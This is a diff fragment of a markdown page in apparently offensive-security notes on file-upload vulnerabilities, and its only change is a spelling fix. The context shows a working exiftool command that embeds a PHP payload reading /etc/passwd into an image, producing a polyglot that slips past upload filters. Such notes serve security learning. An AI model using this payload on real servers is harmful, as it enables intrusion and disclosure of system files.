frankheat/offsecnotes/content/web/vulnerabilities/file-upload-vulnerabilities.md

 exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php
 ```

 This works if you can upload a php extension file.
-This works why you have a real image file (that bypass rescritions) but when you open the image it's executed as php script.
+This works why you have a real image file (that bypass restrictions) but when you open the image it's executed as php script.

 ## Overriding server configuration